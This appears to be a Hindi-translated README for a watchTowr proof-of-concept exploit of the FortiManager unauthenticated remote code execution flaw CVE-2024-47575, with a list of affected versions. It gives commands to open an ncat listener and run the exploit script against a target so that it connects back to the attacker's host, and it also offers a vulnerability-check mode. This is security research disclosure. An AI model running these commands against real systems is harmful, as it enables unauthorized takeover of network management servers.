
Fortinet Fortimanager में बिना प्रमाणीकरण के रिमोट कोड निष्पादन, जिसे FortiJump (CVE-2024-47575) के नाम से भी जाना जाता है
Fortinet FortiManager के बिना प्रमाणीकरण के रिमोट कोड निष्पादन, जिसे FortiJump CVE-2024-47575 भी कहा जाता है
तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें
आरंभ करने के लिए, अपना ncat सत्र स्थापित करें:
nc -lvvnp 80
फिर, हमारा डिटेक्शन आर्टिफैक्ट जनरेटर चलाएँ:
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
अकेले कमजोरी की जाँच करने के लिए, निम्नलिखित विकल्पों का उपयोग करें:
python3 CVE-2024-47575.py --target 192.168.1.110 --action check
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
यह एक्सप्लॉइट Sina Kheirkhah (@SinSinology) द्वारा लिखा गया है, जो watchTowr (@watchtowrcyber) का हिस्सा हैं
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम का अनुसरण करें